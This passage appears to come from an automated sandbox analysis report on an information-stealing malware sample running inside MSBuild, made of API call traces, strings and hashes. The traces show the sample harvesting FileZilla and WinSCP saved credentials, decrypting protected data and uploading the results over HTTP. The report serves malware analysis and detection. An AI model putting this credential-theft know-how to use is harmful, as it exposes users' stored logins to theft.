                                                                                        • API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
                                                                                        • String ID: /
                                                                                        • API String ID: 507856799-4001269591
                                                                                        • Opcode ID: a6a69e9ec3cf8801765d105cb29036808ee146180d7c1341de0be4b221ecb394
                                                                                        • Instruction ID: 0df51f6c7c38cdc7b73c36f3f29490646fb89a6b7ce8503a4d5a956f8c487b71
                                                                                        • Opcode Fuzzy Hash: a6a69e9ec3cf8801765d105cb29036808ee146180d7c1341de0be4b221ecb394
                                                                                        • Instruction Fuzzy Hash: 13218271500218BBDB20EBA1DC86EEE777DEF88700F40513AFA05661C1DF789949CBA4
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
                                                                                        • wsprintfA.USER32 ref: 0040FC12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                        • String ID: wwww
                                                                                        • API String ID: 362916592-671953474
                                                                                        • Opcode ID: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
                                                                                        • Instruction ID: fbce99371d8f23c69195bcece4cb59d5ef7dd42c2aed0f13d542024a30712026
                                                                                        • Opcode Fuzzy Hash: a671d90642e18a916263cb03e8fa96a413124f80aca2b8089fefbc7501649321
                                                                                        • Instruction Fuzzy Hash: 1EF02770B00218ABD71C3B78AC0EE6A3B6EAB81311F041365FF06CA2C0DB704C104AD1
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411329
                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00411339
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041134B
                                                                                        • StrCmpCA.SHLWAPI(?,?), ref: 00411360
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00411385
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 420147892-0
                                                                                        • Opcode ID: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
                                                                                        • Instruction ID: 3ee263357de7356a118a80b25b2dae21b26717c0aa6c402fa6d9d07f030b476f
                                                                                        • Opcode Fuzzy Hash: be8fff6f84b892f8d85d2b578ecce69cb58c0f85215eb4f569bb4dc899e8e412
                                                                                        • Instruction Fuzzy Hash: 70114C75A01618AFDB10DF98DC45BEEB7BCFB49761F0042AAE919E3680D7345A00CBA5
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00411449
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
                                                                                        • StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3243318325-0
                                                                                        • Opcode ID: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
                                                                                        • Instruction ID: f304eba33368e90d87c3244fdfdafea8657fd46212b62d22af59a709f315db57
                                                                                        • Opcode Fuzzy Hash: 2625226fddd4da006d26e06fdee4ba1bf4f4a11824d8d051c31eb45bd74834d2
                                                                                        • Instruction Fuzzy Hash: 83110472944218AFC710CF94DC45BEBBBBCFB06B00F00916AFA0593240DB384A04CBE4
                                                                                        APIs
                                                                                        • CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
                                                                                        • LocalFree.KERNEL32(?), ref: 00406DAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                        • String ID:
                                                                                        • API String ID: 2068576380-0
                                                                                        • Opcode ID: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
                                                                                        • Instruction ID: 5178535980331d1a95a47210b24ee6b6febbe527be0b83028620034588f0433e
                                                                                        • Opcode Fuzzy Hash: 3e89ee642514d63ebe51338df4c39dbce53315f5121b1c3d1af6873a02a67f8e
                                                                                        • Instruction Fuzzy Hash: FE012C79A00209ABDB10DFA8DC55FAA77B9EFC8700F144559FA05AB380DB75ED00CBA4
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
                                                                                        • GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                        • String ID:
                                                                                        • API String ID: 1206570057-0
                                                                                        • Opcode ID: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
                                                                                        • Instruction ID: 78103743301cbd06d6d8d66bd0cdb6708e3bc561754f37119468ce18e8306284
                                                                                        • Opcode Fuzzy Hash: 8218fe93c7511915d8ea69b2df3f7555064dccbdcf9b0fba1e292445f5964255
                                                                                        • Instruction Fuzzy Hash: 8FD012B1601218BBE7109BD4AC0DFDABBACDB05765F4001A1FA05D2241D5B0594087E5
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InfoSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2452939696-0
                                                                                        • Opcode ID: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
                                                                                        • Instruction ID: 2d001d16c60f98aa9cd43fb7044d9c99f47e8ba4ce822719c414ae554ccf3ebb
                                                                                        • Opcode Fuzzy Hash: cc8115d905fbb8cdd454b3d4cd268fd51ce0050b77075ef992d59a3f7f7a50e1
                                                                                        • Instruction Fuzzy Hash: 9DD012B590021C97C710EB90FC859A9B77DEB44301F405695EF05A2141E779AA198BE5

                                                                                        Control-flow Graph (entry block 40b9a0-40ba37; nodes marked Executed / Not Executed; graph not reproduced)
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                          • Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                          • Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                          • Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                          • Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                        • strtok_s.MSVCRT ref: 0040BA5E
                                                                                        • GetProcessHeap.KERNEL32(00000000,000F423F,004201E9,004201E9,004201E9,004201E9), ref: 0040BAA3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAAA
                                                                                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040BAC6
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BAD1
                                                                                          • Part of subcall function 00411200: malloc.MSVCRT ref: 00411209
                                                                                          • Part of subcall function 00411200: strncpy.MSVCRT ref: 00411219
                                                                                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040BB01
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB0C
                                                                                        • StrStrA.SHLWAPI(00000000,<User>), ref: 0040BB42
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB4D
                                                                                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040BB7D
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BB88
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC06
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC1E
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC36
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BC4E
                                                                                        • lstrcatA.KERNEL32(00000000,Soft: FileZilla), ref: 0040BC63
                                                                                        • lstrcatA.KERNEL32(00000000,Host: ), ref: 0040BC6F
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC7F
                                                                                        • lstrcatA.KERNEL32(00000000,00423454), ref: 0040BC8B
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC9B
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCA7
                                                                                        • lstrcatA.KERNEL32(00000000,Login: ), ref: 0040BCB3
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCC3
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCCF
                                                                                        • lstrcatA.KERNEL32(00000000,Password: ), ref: 0040BCDB
                                                                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BCEB
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BCF7
                                                                                        • lstrcatA.KERNEL32(00000000,00423408), ref: 0040BD03
                                                                                          • Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
                                                                                          • Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2
                                                                                        • strtok_s.MSVCRT ref: 0040BD47
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040BD5A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$lstrlen$lstrcpy$AllocFile$HeapLocalstrtok_s$CloseCreateFolderHandlePathProcessReadSizemallocstrncpy
                                                                                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                                                                        • API String ID: 1826205597-935134978
                                                                                        • Opcode ID: 0a0edcdc4cde4ec1ac0265a6167de9880c7b0e3dc5dfc98ac2e77db5e7e6669d
                                                                                        • Instruction ID: 995b618bf102b3cf0671245d97106fbcf4553354a52c55c251f6feeeb9f0d63c
                                                                                        • Opcode Fuzzy Hash: 0a0edcdc4cde4ec1ac0265a6167de9880c7b0e3dc5dfc98ac2e77db5e7e6669d
                                                                                        • Instruction Fuzzy Hash: A4B150729001046ADB14FBA1EC56EEE777CEE50705F54903AF502B24D2EF3C6A0DCAA9

                                                                                        Control-flow Graph (entry block 4045d0-4046ae; nodes marked Executed / Not Executed; graph not reproduced)
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641
                                                                                          • Part of subcall function 00410DF0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410E14
                                                                                          • Part of subcall function 00410DF0: GetProcessHeap.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E23
                                                                                          • Part of subcall function 00410DF0: HeapAlloc.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E2A
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC
                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004047B0
                                                                                        • HttpOpenRequestA.WININET(00000000,0169A460,?,0169B128,00000000,00000000,?,00000000), ref: 004047ED
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404812
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,0168FC00,00000000,?,00423358,00000000,?,?), ref: 00404C21
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00404C33
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404C45
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00404C4C
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00404C5E
                                                                                        • memcpy.MSVCRT ref: 00404C72
                                                                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00404C8B
                                                                                        • memcpy.MSVCRT ref: 00404C95
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00404CA6
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404CBF
                                                                                        • memcpy.MSVCRT ref: 00404CCC
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404CE2
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404CF3
                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404D1A
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404D5F
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404DB3
                                                                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00404DCB
                                                                                        • ExitProcess.KERNEL32 ref: 00404DD6
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404DE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                                                                        • String ID: ------$"$--$------$=tA$ERROR$block$build_id$file_data
                                                                                        • API String ID: 1603122859-1039408876
                                                                                        • Opcode ID: 1c1ffefa2ff13fbe326aa9203372af6fb0db7731481744ecb8c0260a5eb49208
                                                                                        • Instruction ID: 5c63602dc81e6f21b2342bf72322e36899336e6e37317e40e758c60d5b7de2b6
                                                                                        • Opcode Fuzzy Hash: 1c1ffefa2ff13fbe326aa9203372af6fb0db7731481744ecb8c0260a5eb49208
                                                                                        • Instruction Fuzzy Hash: 5E42DB72D10109AADB14FBA1DC92DEE7778AF54304F50817EB212724D1EF386A4DCBA8

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1055 40e3c0-40e446 memset * 4 RegOpenKeyExA 1056 40e448-40e46e RegGetValueA 1055->1056 1057 40e47e-40e4a4 call 40f890 * 4 1055->1057 1058 40e470-40e472 1056->1058 1059 40e4a5-40e4a8 1056->1059 1058->1057 1061 40e474-40e47b RegCloseKey 1058->1061 1059->1058 1063 40e4aa-40e4ac 1059->1063 1061->1057 1065 40e4b8-40e4cd RegOpenKeyExA 1063->1065 1066 40e4ae-40e4b5 RegCloseKey 1063->1066 1067 40e4d3-40e4ef RegEnumKeyExA 1065->1067 1068 40e859-40e867 call 401050 1065->1068 1066->1065 1070 40e4f1-40e4f6 1067->1070 1071 40e515-40e51d call 40f810 1067->1071 1070->1068 1074 40e4fc-40e514 RegCloseKey call 401050 1070->1074 1079 40e522-40e5d9 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 RegGetValueA call 40f9a0 call 40f8f0 call 40f890 RegGetValueA 1071->1079 1101 40e614-40e631 call 40f9a0 call 40f8f0 1079->1101 1102 40e5db-40e612 call 411240 call 40f940 call 40f8f0 call 40f890 1079->1102 1111 40e637-40e72c call 40f890 call 40f9a0 call 40f8f0 call 40f890 RegGetValueA call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 RegGetValueA call 40f9a0 call 40f8f0 call 40f890 StrCmpCA 1101->1111 1102->1111 1142 40e793-40e7e2 call 40f9a0 call 40f8f0 call 40f890 RegEnumKeyExA 1111->1142 1143 40e72e-40e75a call 40dd90 1111->1143 1142->1079 1157 40e7e8-40e845 call 40fa50 lstrlenA call 40fa50 call 40f810 call 401080 call 4142a0 call 40f890 1142->1157 1149 40e75c 1143->1149 1150 40e75e-40e782 call 40f9a0 call 40f8f0 call 40f890 1143->1150 1149->1150 1150->1142 1164 40e784-40e790 call 4114b0 1150->1164 1176 40e851-40e854 call 40f890 1157->1176 1177 40e847-40e84e RegCloseKey 1157->1177 1164->1142 1176->1068 1177->1176
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040E3E4
                                                                                        • memset.MSVCRT ref: 0040E3FE
                                                                                        • memset.MSVCRT ref: 0040E40C
                                                                                        • memset.MSVCRT ref: 0040E41A
                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E442
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E467
                                                                                        • RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E475
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4AF
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E4C9
                                                                                        • RegEnumKeyExA.ADVAPI32(00416CFD,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E4E7
                                                                                        • RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4FD
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,004201E9), ref: 0040E58A
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E5D5
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,UserName,00000002,00000000,?,?,00000000,?,Login: ,00000000,?,:22), ref: 0040E682
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,Password,00000002,00000000,?,?,00000000,?,00423408,00000000,?,?), ref: 0040E6F4
                                                                                        • StrCmpCA.SHLWAPI(?,004201E9,00000000,?,Password: ,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E724
                                                                                        • RegEnumKeyExA.ADVAPI32(00416CFD,?,?,00000104,00000000,00000000,00000000,00000000,00000000,?,00423684), ref: 0040E7D7
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E7F1
                                                                                        • RegCloseKey.ADVAPI32(00416CFD), ref: 0040E848
                                                                                          • Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000008,?,75A8EC10,75AA5460,00000000), ref: 0040DDD8
                                                                                          • Part of subcall function 0040DD90: HeapAlloc.KERNEL32(00000000), ref: 0040DDDF
                                                                                          • Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDF4
                                                                                          • Part of subcall function 0040DD90: HeapFree.KERNEL32(00000000), ref: 0040DDFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseHeapmemset$EnumOpenProcesslstrcpylstrlen$AllocFreelstrcat
                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                        • API String ID: 376919160-2798830873
                                                                                        • Opcode ID: 2a604499cc5fb1fbc1fa5b3e87ccd38f4035980184baed312169c8e40c75f4d7
                                                                                        • Instruction ID: ae86b70a3009f92c38161279bc2e3da00af9fe4ff8be4466f6dea0ea82a0e72c
                                                                                        • Opcode Fuzzy Hash: 2a604499cc5fb1fbc1fa5b3e87ccd38f4035980184baed312169c8e40c75f4d7
                                                                                        • Instruction Fuzzy Hash: 7BD11DB2910119AEDB24EBA1DC91EEEB37CAF54304F50457EF105B2591EB386B48CB68

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1370 4144b0-414f76 call 40f810 call 40f9a0 call 40f8f0 call 40f890 call 401ec0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fb60 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410340 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 4103e0 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410420 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 GetCurrentProcessId call 411090 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 4105a0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410730 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410900 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fb20 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fae0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 4102c0 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fc30 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fb60 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 
